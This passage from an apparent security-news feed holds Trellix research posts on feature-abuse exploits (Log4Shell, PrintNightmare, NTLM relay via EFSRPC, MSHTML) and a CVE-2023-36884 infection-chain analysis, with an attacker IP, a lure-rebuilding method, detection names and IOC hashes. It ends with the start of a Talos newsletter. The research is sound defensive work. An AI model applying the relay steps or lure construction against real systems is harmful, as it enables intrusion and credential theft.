different between the protected and unprotected code. While this was just the tip of the iceberg, it made exploiting UAF vulnerabilities extremely challenging since it required the attackers to address specific timing constraints and memory thresholds as well. Figure 2 below is the simple visualization of Windows OS memory exploit mitigations introduced over the past decade or so.\n\n **Figure 2 \u2013 Evolution of Windows OS exploit mitigations**\n\nHowever, time and again, we have seen these exploit mitigations being bypassed within a short period after they were introduced, primarily because either all the code including dependent, and third party code was not compatible with or not compiled with those mitigation switched on in the compiler. This essentially meant that the exploit mitigation was not enforced on every part of the code, or the mitigation itself was not completely implemented, leaving multiple loopholes which in turn could be exploited . For instance, it can be noted from the above visualization that ASLR was not implemented in initially in its entirety but rather in stages, thereby leaving much of the code still vulnerable to bypasses.\n\n##### Memory Corruption vulnerabilities \u2013 Will it become a thing of the past? \n\nWhile memory corruption vulnerabilities continue to be the most widely reported class of bugs , converting them into full-fledged weaponized exploits has become a challenge over the recent years owing to the exploit mitigations introduced at the OS as well as the client side application (For e.g., scripting engines). Translating memory corruption vulnerabilities into full blown exploits leading into arbitrary code execution, requires bypassing multiple mitigations without triggering any endpoint security solution protection or detection. This now means significant invest in effort, time and cost is required by adversaries to research exploit mitigation bypasses. On several occasions, adversaries may also need to chain multiple vulnerabilities to be able execute a working exploit on the target system which also significantly increases the development cost , raising the bar of exploitation.\n\nWe believe that this exploitation mitigations evolution is going to be crucial in shaping the nature of vulnerability classes of interested to adversaries in the future. The question : \u201cWill memory corruption vulnerabilities become extinct ?\u201d is debatable and requires some introspection.\n\n##### Exploitation Strategies of the Future - What lies ahead? \n\nMemory corruption vulnerabilities will continue to exist in the applications as long as there is some code in the application that handles memory incorrectly, but the intensity and frequency of exploitation of this class of vulnerabilities will eventually fade out. We had witnessed multiple instances of exploitation techniques in the past where attackers achieved arbitrary memory Read/Write (R/W),by exploiting a memory corruption flaw and using that primitive to change certain flags or data in the application memory leading to code execution. These set of methods codenamed \u201cdata only attacks\u201d were relatively easier strategies seen in many exploits. Eventually randomizing certain critical data structures locations in memory reduced this nature of attacks over time. \n\nWith feature rich applications, attackers will always be on a lookout for the easier strategies to achieve code execution on the target system. There are always legacy systems around exposed to the internet which will offer the path of least resistance to the attackers since they lack the mitigations introduced. However, one of the ways forward in this direction is to abuse the feature or design flaws in the application or in the network protocol. If adversaries can determine the way to abuse the inherent design or feature of the target application, for instance, making the application or a service connect to the attacker controlled machine without orchestrating the memory explicitly, it becomes relatively easier to achieve remote code execution and at the same time, causing havoc on the target machine since the functionality of the arbitrary code executed by the exploited process is completely on the imagination of the attacker. Figure 3 below is a simplistic view on the progression of exploitation strategies over the last few years. \n\n **Figure 3 \u2013 Adversary exploitation strategy evolution**\n\nWe have witnessed data only attacks and abuse of application features/design flaws several times over the last few years. They offer multiple advantages over the traditional memory corruption exploits, and some of the reasons we believe this is going to be the exploitation strategy of the future are:\n\n * It has the potential to bypass exploit mitigations in place and hence adversaries do not have to engineer the exploit specifically to address those barriers. \n * Arbitrary code is executed with the privileges of the exploited process and hence helps elevate the privileges.\n * Exploits taking advantage of application\u2019s inbuilt feature or design flaws does not have to deal with the explicit memory manipulation and space constraints before the vulnerability is exploited. Consequently, getting rid of injecting the shellcodes in the memory and the older stack pivoting techniques. \n * Relatively easier to exploit with lesser development / maintenance cost and time to weaponize it. \n\nRetrospection of critical vulnerabilities over the last couple of quarters can give us the definite clue on how the future attacks will take shape. In the following sections, we take a look at some of the more recent high impact vulnerabilities and check how features or design flaws in the service or application were abused to achieve code execution or sensitive information leak with minimum resistance.\n\n##### CVE-2021-44228 \u2013 Apache Log4J2 Logging Library Vulnerability Leading to Remote Code Execution\n\nThis RCE vulnerability reported in Apache\u2019s Log4j Logging library is one of the most critical flaws reported in the recent years, allowing attackers to execute arbitrary code on the vulnerable server that uses Log4J logging library to log text messages. [In our previous blog](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/vulnerability-discovery-in-open-source-libraries-part-1-tools-of-the-trade/>), we discussed at great length on how open source softwares serves as the building blocks of modern software development and how critical it is to audit them as any vulnerability will have a significant impact on the product using it. \n\nThe vulnerability lies in the \u201c**Lookup**\u201d method of \u201c**jndimanager**\u201d class. When the JNDI URL is included in the request message parameter to be logged by log4j, the apache\\logging\\log4j\\core\\lookup\\JndiLookup.lookup () method is called with the JNDI URL which in turn calls the net\\JndiManager.lookup () method as shown in figure 3 below, leading to the initiation of the remote JNDI lookup to the attacker controlled server. This allows the attacker controlled server to send the malicious JNDI reference in the response leading to the execution of arbitrary code on the vulnerable server. \n\n **Figure 4 \u2013 JNDI lookup**\n\nThis RCE was made possible because Java implements a variety of JNDI ( Java Naming and Directory Services) service providers like LDAP, DNS, RMI and CORBA; loading remote classes was also possible, depending on the default system properties set.\n\n**CVE-2021-44228** is a classic example of feature exploitation. The feature abused here was the [lookup substitution](<https://logging.apache.org/log4j/2.x/manual/configuration.html#PropertySubstitution>) which supports [Lookups](<https://logging.apache.org/log4j/2.x/manual/lookups.html>). Lookups are way to add values to the log messages which are typically variable names resolved using a defined map or at the runtime via implemented interfaces like [StrSubstitutor](<https://logging.apache.org/log4j/2.x/log4j-core/apidocs/org/apache/logging/log4j/core/lookup/StrSubstitutor.html>) and [StrLookup](<https://logging.apache.org/log4j/2.x/log4j-core/apidocs/org/apache/logging/log4j/core/lookup/StrLookup.html>) classes. \n\nLog4j supports the property syntax \u201c${prefix:name}\u201d where prefix indicates the Log4j that the variable name should be evaluated in the specific context. JNDI context is built into Log4J as shown below.\n\n **Figure 5 \u2013 JNDI context**\n\n **Figure 6- JNDI lookup descripton**\n\nSince JNDI lookups was enabled by default in Log4J version 2.14.1 and prior (see figure 6 above), the library could identify the JNDI references passed as the parameter value in the HTTP request headers logged on the server , consequently allowing attackers to inject malicious JNDI references in the HTTP request parameters leading to remote Java code execution.\n\n##### CVE-2021-34527 \u2013 Windows Print Spooler Service Vulnerability Leading to Remote Code Execution\n\nPrivileged remote code execution vulnerability in spoolsv.exe i.e., PrintNightmare was another critical vulnerability reported last year and serves as good illustration of how a design flaw in the protocol can be abused to execute arbitrary code on the target machine without having to operate on the memory. \n\nThe vulnerability was exploited over Print System Remote Protocol ([MS-RPRN](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/d42db7d5-f141-4466-8f47-0a4be14e2fc1>)) and Print System Asynchronous Remote ([MS-PAR](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-par/695e3f9a-f83f-479a-82d9-ba260497c2d0>)) protocol, by making RPC calls over SMB. The exploit takes advantage of a classic design flaw in the implementation of the print server component in the spooler service, when RPC requests are made to MS-RPRN and MS-PAR interfaces to install the printer drivers on the target system. Making the RPC call to [RpcAddPrinterDriverEx](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/b96cc497-59e5-4510-ab04-5484993b259b>) (MS-RPRN Opnum 89) or [RpcAsyncAddPrinterDriver](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-par/5d864e3e-5d8b-4337-89ce-cb0258ab97cd>) (MS-PAR Opnum 39) requires a DRIVER_CONTAINER structure to be passed as an argument. \n\n **Figure 7 \u2013 DRIVER_CONTAINER structure**\n\nAs indicated in the above structure details, DRIVER_CONTAINER contains **pDriverPath** and **pConfigFile**, which are the full path of the filename containing the printer driver and configuration module respectively. Both **pDriverPath** and **pConfigFile** are checked for the UNC path to prevent arbitrary code from loading. \n\nThe design or logic flaw in the code here is that same UNC path check is not applied to **pDataFile**, which is the full path of the file containing printer data. An adversary could make multiple calls to **RpcAddPrinterDriverEx** with:\n\n 1. **pDataFile** as the UNC path of the malicious DLL accessible to the target machine which when successful will copy the malicious DLL to the target machine locally.\n 2. Same API with the copied file name assigned to the **pConfigFile** (this time the malicious DLL becomes the local path) , leading to loading of malicious code by print spooler service. \n **Figure 8 \u2013 Adversary calls to driver installation API RpcAddPrinterDriverEx**\n\n##### CVE-2021-36942 \u2013 LSA Spoofing Vulnerability in Windows Leading to Credential Leaks\n\nRPC over SMB had always been on the forefront of many exploitation methods. This vulnerability could be exploited by again abusing [MS-EFSRPC](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31>) protocol, which is used in windows to manage the files on the remote system and encrypted using [Encrypting File System](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/230807ac-20be-494f-86e3-4c8ac23ea584#gt_3bd30c20-9517-4030-a48c-380362e209a1>) ( EFS ). \n\nBy making specific RPC calls like [EfsRpcOpenFileRaw](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31>) over LSARPC interface attacker can make one windows host authenticate to another server; essentially meaning that a target server can be made to authenticate to an adversary controlled server via NTLM authentication. More importantly, LSARPC can be issued using RPC calls without any prior authentication and if this target server is Active Directory (AD), then adversary can make AD connect to the arbitrary server using the machine account for NTLM authentication. This EFSRPC protocol can be abused to chain multiple vulnerabilities within the enterprise network to relay NTLM credentials to an attacker controlled server which could be used to perform lateral movement, eventually leading to complete domain compromise. \n\n **Figure 9 \u2013 Adversary making RPC call to EFSRPC interface**\n\nIf the adversary is controlling an IIS web server with the Active Directory Certificate Services ( AD CS ) feature installed and is configured to use NTLM over HTTP authentication, making an Active Directory authenticate to IIS will result into leaking the NTLM credentials to the adversary, resulting in complete domain compromise. While NTML relay attacks aren\u2019t new, it is recommended to use more secure authentication mechanism like Kerberos to prevent protocol abuse like this.\n\n **Figure 10 \u2013 Authentication providers in IIS web server**\n\nIn summary, being able to abuse a protocol or a feature to make a critical asset connect to an externally owned adversary server comes with a dangerous consequence as demonstrated by the CVE-2021-44228 Log4J vulnerability.\n\n##### CVE-2021-40444 \u2013 Windows MSHTML Vulnerability Leading to Remote Code Execution\n\nThis was yet another critical vulnerability exploited last year and is a great example of how a simple feature abuse can be chained with a logic flaw to achieve arbitrary code execution. First, Object Linking and Embedding (OLE) was used to link the document to the external OLE object. Historically, OLE has played a significant role in building weaponized office exploits and this will continue to happen as it is one of the core features of MS-Office file format designed specifically to address interoperability. \n\n[MS Office Open XML specifications](<https://www.ecma-international.org/publications-and-standards/standards/ecma-376/>) allows a document to embed or link to internal or external objects and in particular link to the external OLE object is specified via relationships . As shown in the crafted exploit document below, the **document.xml.rels** file with **Type** attribute as \u201coleObject\u201d, **Target** attribute set to the OLE object link and **TargetMode** set as external. This allows the crafted document to link to the externally hosted malicious object and invoke the respective protocol / resource handlers for rendering the object, to exploit a potential logic / design flaw in the handler. This is typical OOXML template injection techniques used in many OOXML exploits in the past. We had an in depth look on OLE exploits in our [previous blog post](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/an-inside-look-into-microsoft-rich-text-format-and-ole-exploits/>).\n\n **Figure 11 \u2013 document.xml.rels file in the OOXML document linking to external OLE object**\n\nHTML code processing is done in **mshtml.dll** while HTTP protocol and MSHTML downloads are verified for trust and handled in urlmon.dll. The design flaw in the **urlmon.dll** code was in relation to the extraction and the trust verification of the downloaded CAB file. The CAB file was downloaded via Javascript (JS) code embedded within the **side.html** page as in figure 11 above. Because of the missing path escape checks during the extraction of the CAB file, it allowed the exploit to extract the file contained within the CAB with the relative path per figure 12 below. This resulted into dropping of the malicious payload outside of the created TEMP directory, eventually allowing the dropped payload to be executed.\n\n **Figure 12 \u2013 Vulnerability in CAB file extraction function in urlmon.dll**\n\n##### Conclusion\n\nThere has been a trend in the past few years of vulnerabilities like CVE-2021-44228, CVE-2021-34527, CVE-2021-36942 and CVE-2021-40444 described above which take advantage of inherent processing flaws and are predominantly feature abuse. While memory corruption flaws will continue to proliferate as long as insecure code exists in non-memory safe languages other than Rust, we certainly expect to see the exploitation trend moving more towards exploiting design or logic flaws and protocol abuses. Consumers as well as the developers of open source software need to be more vigilant as these flaws will allow adversaries to achieve their initial system level objective of moving laterally within the network ,without worrying about the defense in depth of recently matured memory exploit mitigations.\n", "cvss3": {}, "published": "2022-01-24T00:00:00", "type": "trellix", "title": "Beyond Memory Corruption Vulnerabilities \u2013 A Security Extinction and Future of Exploitation", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-34527", "CVE-2021-36942", "CVE-2021-40444", "CVE-2021-44228"], "modified": "2022-01-24T00:00:00", "id": "TRELLIX:ED6978182DFD9CD1EA1E539B1EDABE6C", "href": "https://www.trellix.com/content/mainsite/en-us/about/newsroom/stories/research/beyond-memory-corruption-vulnerabilities.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-24T00:00:00", "description": "# The Tale of Two Exploits - Breaking Down CVE-2023-36884 and the Infection Chain\n\nBy [Chintan Shah](<https://www.trellix.com/en-in/about/newsroom/stories/contributors/chintan-shah.html>) \u00b7 August 24, 2023\n\n## Executive Summary\n\nOn July 11 2023, Microsoft released a patch fixing multiple actively exploited RCE vulnerabilities and [disclosed](<https://www.microsoft.com/en-us/security/blog/2023/07/11/storm-0978-attacks-reveal-financial-and-espionage-motives/>) a phishing campaign conducted by the threat actor, identified as Storm-0978, which targeted entities in Europe and North America. This campaign used a zero-day vulnerability tracked as CVE-2023-36884, a remote code execution vulnerability in windows search files that is exploited via crafted Office Open eXtensible Markup Language (OOXML) documents with specific geopolitical lures related to Ukraine World Congress (UWC). While, there was a [workaround](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36884>) suggested to mitigate this vulnerability, on August 8 2023, [Microsoft Office Defense in Depth update](<https://msrc.microsoft.com/update-guide/vulnerability/ADV230003>) was released breaking the exploitation chain which led to RCE through windows search (*.search-ms) files.\n\nHardening of operating systems and several exploit mitigation features have resulted in steady decline in the exploitation and weaponizing of memory corruption vulnerabilities. Abusing features of Microsoft Office has been at the forefront and the top techniques for adversaries to execute targeted attacks. This is fundamentally because of its rich set of features exposing larger attack surface, wider adoption, and ease of exploitation, ultimately becoming a lucrative attack vector. We\u2019ve had many such instances in the past like CVE-2022-30190, [CVE-2021-40444](<https://kcm.trellix.com/corporate/index?page=content&id=KB94876>) and many others where Office documents had been used either as a carrier for other file format exploits or used to link them to the malicious external resources or objects, which in turn exploits vulnerabilities via invoking respective object renderers. Office documents historically also have been used to chain multiple vulnerabilities together to achieve Remote Code Execution (RCE). Previously, we blogged about CVE-2022-37985, an information disclosure vulnerability in Windows Graphics Component, which can be exploited through Office documents, and when chained with other vulnerabilities giving arbitrary write primitives, has potential to achieve code execution. \n\nIn this blog, we will take a deeper look at the malicious OOXML, and embedded Rich Text Format (RTF) document exploit used in targeted attacks against government entities and visualize the attack sequence and chain of exploits. We will also attempt to reconstruct the document lures programmatically using the same technique with sample code and further highlight the Trellix IPS and product coverage against the exploits used in this attack.\n\n## Introduction\n\nIn this attack campaign, threat actors used multiple OOXML documents with the name and hashes: \n\nOverview_of_UWCs_UkraineInNATO_campaign.docx [2400b169ee2c38ac146c67408debc9b4fa4fca5f]\n\nLetter_NATO_Summit_Vilnius_2023_ENG (1).docx [3de83c6298a7dc6312c352d4984be8e1cb698476]\n\n\n\n\n\nFigure 1 \u2013 document lures used in the campaign \n\n\nWhile quickly scanning OOXML lures through in-house built Office file analysis engine, we noticed RTF document embedded inside and on further analysing RTF through the same scanning engine, multiple suspicious indicators were noticed as shown below. This triggered our investigation on the technique used to embed RTF into OOXML and see if we can apply the same method to reconstruct the lures leading to chain of infection.\n\n Figure 2 - Detection for document lures \n\n\nDocument structure of both exploits used in this campaign are similar to the one used in the Follina attack (CVE-2023-30190). However, in the Follina exploit, Object Linking was used to link the OOXML document to the externally hosted HTML file as detailed in our previous blog. While in the OOXML exploiting CVE-2023-36884, **Alternate Format Chunk (AltChunk / aFChunk)** embeds an RTF file within the OOXML. Use of the AltChunk class is indicated by the **w:altChunk** element tag in the document.xml file when the container document is deflated as shown below:\n\n Figure 3 \u2013 document.xml using altChunk to embed malicious RTF \n\n\n## Use of \u201cAlternative Chunk\u201d in CVE-2023-36884\n\nTraditionally, Office exploits used Object Linking and Embedding (OLE) to embed external content into the container application. In this exploit, **altChunk (stands for Alternative Chunk)** is used, which is an OpenXML standard providing the way to merge two documents into a single larger document. The **AltChunk** element indicates the container application to import the content stored in the alternative part of the document (in this case, an RTF document).\n\nThe **altChunk** element specifies the location in the OOXML document for inserting the content of the specified file into the target document. The content type to be inserted and the location of the file is specified by the relationship **Type** and **Target** elements with the same relationship id as used above in **document.xml.rels** within the **/word/_rels** directory as shown in the exploit below. \n\n Figure 4 \u2013 Relationship Target referring embedded RTF \n\n\nAs per the [specifications](<https://learn.microsoft.com/en-us/openspecs/office_standards/ms-oi29500/c391c28f-1b03-4a21-a4f8-4d9cddd4a95c>), the relationship Type should be \u201c**\u2026/relationships/aFChunk**\u201d, as shown above, and the **TargetMode** should be specified as \u201cInternal,\u201d which is missing but Office seems to ignore the attribute and still processes the document. Multiple content types can be imported with this method including application/rtf, application/html, application/text, application/xml, etc, which effectively allows OOXML documents to be used as a carrier for other file format exploits.\n\n## Analysis of embedded RTF (afChunk.rtf)\n\nTaking a deeper look at the embedded RTF document, it has precisely two embedded objects which download additional malware payloads through redirection chains. One of the embedded OLE objects inside the RTF is a linked object indicated by a \u201c**objautlink**\u201d RTF control word followed by \u201c**objupdate**\u201d, which forces the objects / links to update before displaying the contents of the linked object. \n\n Figure 5 \u2013 Embedded object 1 in RTF \n\n\nAdditionally, the embedded object contains the Universal Naming Convention (UNC) path to the external IP, initiating the connection to the externally hosted SMB server to download another file **file001.url** (SHA-1 70560aff35f1904f822e49d3316303877819eef8). This is again the Word document embedding the HTML content with iframe source, which is rendered upon launching the original document.\n\n  \n\n\n\n\n\n\n \n\n\n\n\n\n\nFigure 6 \u2013 View of OLE object using OLE2LINK technique of linking RTF doc \n\n\nWhile another OLE object is also a linked object, with objclass of \u201cxmlfile\u201d and oleclsid of \u201cStdOleLink\u201d object. This effectively means the StdOleLink OLE object is used to link the RTF to an externally hosted XML file. This was one of the widely adopted techniques and was also used in massively exploited CVE-2017-1099. However, this linking feature can still be used in the similar fashion to exploit logic flaws in other renderer components. Once the RTF is launched, connection is initiated to the external IP to retrieve start.xml which is then rendered by [SAX XML Reader 6.0](<https://learn.microsoft.com/en-us/previous-versions/windows/desktop/ms764622\\(v=vs.85\\)>) ( msxml6.dll). This retrieved XML file in turn has embedded iframe source pointing to another file RFile.asp in the same path. Part of the infection chain can be visualized below.\n\n Figure 7 \u2013 Embedded object 2 in RTF \n \n Figure 8 \u2013 View of OLE object using OLE2LINK technique of linking RTF doc \n \n Figure 9 \u2013 RTF document initiating connection to retrieve start.xml \n \n Figure 10 - Contents of start.xml containing iframe \n\n\nAs seen in the _RFile.asp_ code below, it starts with the timeout of 30000 seconds and then it loads another iframe contained within which retrieves a .htm file from the same attacker-controlled server 104.234.239.26, which has the dynamically generated file based on the IP address of the victim and the unique id in the path of the HTTP request.\n\n Figure 11 \u2013 Contents of the RFile.asp \n\n\nApparently, the infection chain turns out to be a series of iframe redirects and resumes with the fetching of the .htm file and subsequently search-ms files, and eventually ends up downloading the final payload. The entire infection chain can be very well visualized with following infographic:\n\n Figure 12 \u2013 Visualization of CVE-2023-36884 infection chain \n<https://twitter.com/r00tbsd/status/1679042071477338114> \n\n\n## Can we reconstruct the exploit using URL Moniker and \u201cAltChunk\u201d?\n\nThe below C# sample code uses the **DocumentFormat.OopenXML** package and demonstrates how we can reconstruct the OOXML document with embedded RTF using the \u201caltChunk\u201d class as used by attackers in this campaign. This code will embed _Document1.rtf_ into _Document2.docx_ and will create another file with the name CVE-2023-36884.docx. \n\nTo be able to altChunk the RTF document into OOXML, the code first initializes a unique altChunkId as a relationship id. It then creates the new AlternativeFormatImportPart with the altChunkID and calls OpenXML API **AddAlternativeFormatImportPart** with **AlternativeFormatImportPartType** as the RTF, adding to the main document (CVE-2023-36884.docx). As mentioned in the previous sections, [AlternativeFormatImportPartType](<https://learn.microsoft.com/en-us/dotnet/api/documentformat.openxml.packaging.alternativeformatimportparttype?view=openxml-2.8.1>) is of type enum which specifies content types to be imported.\n\n Figure 13 : AlternativeFormatImportPartType used to import multiple content types \n\n\nSubsequently, after creating the new AltChunk, contents of the Document1.rtf are inserted at the end of the main document (CVE-2023-36884). We believe that the same technique must have been used by authors to build the exploit. \n\nFigure 14: Document1.rtf \n\n\nFigure 15: Document2.docx \n\n\n\n\n\n\n \n Figure 16: Code to insert RTF into DOCX using AltChunk \n \n Figure 17: Reconstructed POC exploit with connection to start.xml initiating the infection chain \n\n\n## Trellix IPS protection and Product Coverage against this attack \n\nTrellix NSP has been one of the most advanced IPS in the security industry, consistently engaged in protecting customers from advanced attacks. Some of the cutting-edge IPS features like **Microsoft Office Deep File Inspection** and **Multi Attack ID Correlation** protect customers against a variety of file format attacks and help correlate multiple low or medium severity alerts in the attack cycle, increasing overall confidence level. [Trellix IPS released](<https://kcm.trellix.com/agent/index?page=content&id=KB96639>) following the detections for protection against this attack.\n\nIPS Attack ID\n\nAttack Name\n\n0x452d8200\n\nHTTP: Microsoft Office Remote Code Execution Vulnerability (CVE-2023-36884)\n\n0x452da500\n\nHTTP: Microsoft Office Post Exploitation Activity I (CVE-2023-36884)\n\n0x452d8300\n\nHTTP: Microsoft Office Post Exploitation Activity (CVE-2023-36884)\n\n \n\n\n### Trellix Product Coverage\n\nProduct \n\nDetection Details \n\nENS-AV \n\nPUP-ILJ \nRTFObfustream.a \nGeneric Trojan.mq \nHTML/Agent.s \nHTML/CVE2023-36884.a \n\nENS-EP \n\nCVE-2023-36884_Office_and_Windows_HTML_Remote_Code_Execution_Vulnerability.md \n\nHX-IOC \n\nSUSPICIOUS LAUNCH OF MSDT.EXE BY OFFICE APPS A (METHODOLOGY) \n\nHX-AV/MG \n\nTrojan.GenericKD.67946770 \nExploit.CVE-2017-0199.02.Gen \nTrojan.GenericFCA.Agent.98791 \nTrojan.GenericFCA.Agent.98790 \n\nNetwork (NX) \n\nNX \nTrojan.Generic.DNS \nTrojan.Generic.DNS \nNX IPS \nFE_Office and Windows HTML CVE-2023-36884 Remote Code Execution Vulnerability \nFE_Office and Windows HTML CVE-2023-36884 Remote Code Execution Vulnerability \nFE_Office and Windows HTML CVE-2023-36884 Remote Code Execution Vulnerability \nFE_Office and Windows HTML CVE-2023-36884 Remote Code Execution Vulnerability \nFE_Office and Windows HTML CVE-2023-36884 Remote Code Execution Vulnerability \nFE_Office and Windows HTML CVE-2023-36884 Remote Code Execution Vulnerability \n\nMVX \n\nFE_Exploit_RTF_CVE20170199_1\\ \nFEC_Exploit_RTF_CVE20170199_1_FEBeta\\ (703874) \nFEC_Exploit_RTF_Generic_1_FEBeta\\ (703875) \nFEC_Exploit_RTF_Generic_2_FEBeta\\ (703876) \nFEC_Trojan_HTML_Generic_64_FEBeta\\ (703877) \nSuspicious Network Activity\\ (10405) \nTrojan.Generic.MVX\\ (43183) \n\nHELIX \n\nWINDOWS METHODOLOGY [Office Suspicious Child Process] (1.1.2497) \nWINDOWS METHODOLOGY [Impacket Secretsdump] (1.1.3336) \nIMPACKET OBFUSCATION [WmiExec Commands](1.1.3942) \n\n \n\n\n## Conclusion \n\n## \n\nMicrosoft Office continues to be the top target for attackers, especially when it comes to abusing features and exploiting design and logic flaws. As the native memory corruption flaws gradually decline along with the inherent challenges in weaponizing them, this feature rich application, with its wider attack surface, provides an attacker a path of least resistance. In one of our previous blogs, we predicted this exploitation trend, and CVE-2023-36884 is yet another validation of that. We believe this trend is going to continue with vulnerabilities in the application features and their easy exploitation remaining a challenge for organizations. Consequently, endpoint and network security solutions will have to continuously evolve to address those challenges. By applying secure application design and development, we can certainly break the exploitation chain and remain protected against these attacks. \n\n## Indicators of Compromise (IOCs)\n\n### Hashes of malicious files\n\nMD5 hash \n\nFilename \n\n227874863036b8e73a3894a19bd25a0 \n\nOverview_of_UWCs_UkraineInNATO_campaign.docx \n\n00ad6d892612d1fc3fa41fdc803cc0f3 \n\nLetter_NATO_Summit_Vilnius_2023_ENG(1).docx \n\n3ca154da4b786a7c89704d0447a03527 \n\nafchunk.rtf \n\n0c72b2479316b12073d26c6ed74d3bdc \n\nstart.xml \n\n7bbe0e887420d55e43ce1968932e1736 \n\nRFile.asp \n\ne65a1828d6afe3f27b4ec7ec1a2fee20 \n\n1111.htm \n\n510823c639f6a608b59d78b71be50aab \n\n2222.chm \n\nf49a0d153660cf95d7113c1d65e176ff \n\nINDEX.htm \n\nf0cd84693a7481834fa021496c3ec9e9 \n\nfileH.mht \n\n0fff39ae5d049967c2c74db71eeda904 \n\nex001.url \n\n54cfc7f45302d9793af97bd7d33c6e9a \n\nfile001.vbs \n\n8639c28a3fba0912fcf563b31f97d300 \n\ntestdll.dll \n\n476274dc8efda182acd47ac0a5362a5a \n\nfile001.vbs \n\ne6f8b0299ca4d44bf09dc4e443fb503c \n\ntestdll64.cpl \n\na38aa3eaf3ffb79fbd50f503ccea2f25 \n\nfileH.htm \n\nfe8a942370a6881ee9d93f907cae7aa5 \n\nfile1.mht \n\n7fd97c71ef08a0f066ce4fbf465d1062 \n\nfile1.htm \n\n26a6a0c852677a193994e4a3ccc8c2eb \n\nfile001.url \n\n218a069f4711d84100062d01a41d960f \n\nex001.zip \n\n76f918cbfa4075101a61aac74582f755 \n\ncalc.exe \n\n_ This document and the information contained herein describes computer security research for educational purposes only and the convenience of Trellix customers. _\n", "cvss3": {}, "published": "2023-08-24T00:00:00", "type": "trellix", "title": "The Tale of Two Exploits - Breaking Down CVE-2023-36884 and the Infection Chain", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0199", "CVE-2017-1099", "CVE-2021-40444", "CVE-2022-30190", "CVE-2022-37985", "CVE-2023-30190", "CVE-2023-36884"], "modified": "2023-08-24T00:00:00", "id": "TRELLIX:D3CC9DD7452C6A1D346229DE526BBE46", "href": "https://www.trellix.com/content/mainsite/en-us/about/newsroom/stories/research/breaking-down-cve-2023-36884-and-the-infection-chain.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "talosblog": [{"lastseen": "2023-03-24T20:18:32", "description": "\n\nWelcome to this week's edition of the Threat Source newsletter.\n\nThere is no shortage of [hyperbolic headlines](<https://www.businessinsider.com/chatgpt-jobs-at-risk-replacement-artificial-intelligence-ai-labor-trends-2023-02?ref=blog.talosintelligence.com>) about ChatGPT out there, everything from how it and other AI tools like it are here to replace all our jobs, make college essays a thing of the past and change the face of cybersecurity as we know it.\n\nIt's the talk of SEO managers everywhere who can't wait to find a way to work "ChatGPT" into a headline. And in the security community, everyone is concerned that AI models will help attackers get smarter, faster or more dangerous.\n\nThe biggest issue I'm seeing with that is these tools aren't that smart.\n\nOther writers have done a [far more eloquent](<https://www.theatlantic.com/technology/archive/2022/12/chatgpt-openai-artificial-intelligence-writing-ethics/672386/?ref=blog.talosintelligence.com>) and interesting job than I can in a few dozen words here about [how bad these models are at writing creatively or interpreting human emotion](<https://www.vice.com/en/article/bvmk9m/everybody-please-calm-down-about-chatgpt?ref=blog.talosintelligence.com>), but I wanted to put my own spin on things with my incredibly niche interests and use case for ChatGPT.\n\nFirst, I asked it to help me write this newsletter. While it politely declined to do the whole thing for me because it can't produce something on Talos' behalf, it did start to compile a list of "the top stories we're following this week."\n\n\n\nThese headlines included an update on the Cring malware that seems to be referencing [a campaign from November 2021](<https://www.zdnet.com/article/cring-ransomware-continues-assault-on-coldfusion-servers-vpns/?ref=blog.talosintelligence.com>), a [16-month-old CVE from Microsoft](<https://nvd.nist.gov/vuln/detail/CVE-2021-40444?ref=blog.talosintelligence.com>) and a story about [money laundering in "Fortnite"](<https://slate.com/technology/2019/01/fortnite-video-games-money-laundering-scams.html?ref=blog.talosintelligence.com>) that broke in January 2019.\n\nThen I decided to ask it about wrestling, mainly because I was fresh off watching AEW: Revolution this weekend, about who will eventually beat Maxwell Jacob Friedman for the company's title. The information it provided was shockingly lackluster considering a quick Google provided more accurate details.\n\n\n\nOne of the examples it floated was that Bryan Danielson could eventually dethrone MJF, and that "if" they two were to face, it'd be a "must see" match. Problem is, the two did literally face off Sunday night and Danielson lost. Another option, CM Punk, would create a "huge moment" for the company if he won the AEW titles, something he's already done twice (he also may never appear on TV again, but that's a long story for not this newsletter).\n\nThese are two incredibly specific examples, but I felt like it was cathartic for me to see this in action so I didn't have to lose any sleep over thinking ChatGPT or another AI was going to take my job from me next week, or my wrestling fandom for that matter.\n\n## The one big thing\n\nU.S. President Joe Biden's administration [released its new National Cybersecurity Strategy on March 2](<https://www.whitehouse.gov/briefing-room/statements-releases/2023/03/02/fact-sheet-biden-harris-administration-announces-national-cybersecurity-strategy/?ref=blog.talosintelligence.com>), outlining steps the federal government plans to take to combat cyber criminals, defend critical infrastructure and enforce security regulations in oft-targeted industries. The administration said it will pursue laws to hold software companies liable if they sell technology that lacks proper cybersecurity protections, and use \"national powers" to disrupt state-sponsored actors.\n\n### Why do I care?\n\nThis is the first new cybersecurity policy from the U.S. government in five years, outlining how the next few years of cybersecurity policy may look and what other goals would look like in a hypothetical second term for Biden. If the desired laws eventually pass and are enforced, they would [represent a major shift](<https://www.politico.com/news/2023/03/02/biden-regulations-infrastructure-cyberattacks-00085117?ref=blog.talosintelligence.com>) in the way we view digital service providers and reframes how government and private entities should look at cybersecurity.\n\n### So now what?\n\nThe strategy doesn't mean much for the average user right now, but it does mean there will be heavy debates in the near future about regulating the software-as-a-service industry and the monetary investment needed to address many of the issues the Biden administration outlined.\n\n## Top security headlines of the week\n\nMeta, Google and other social media sites are **sharing user data and chat logs to prosecute individuals in states where abortion is illegal.** Since the Supreme Court overturned U.S. national abortion law last year, there have been several cases where prosecutors have relied on data collected by online pharmacies, social media posts, and user data requests to charge women who were seeking an abortion. Online pharmacies that sell abortion medication share sensitive information with Google and other third-party sites, including users' web addresses, relative location and search data, which the third parties may eventually be asked to turn over to law enforcement. The large companies who manage this data rarely 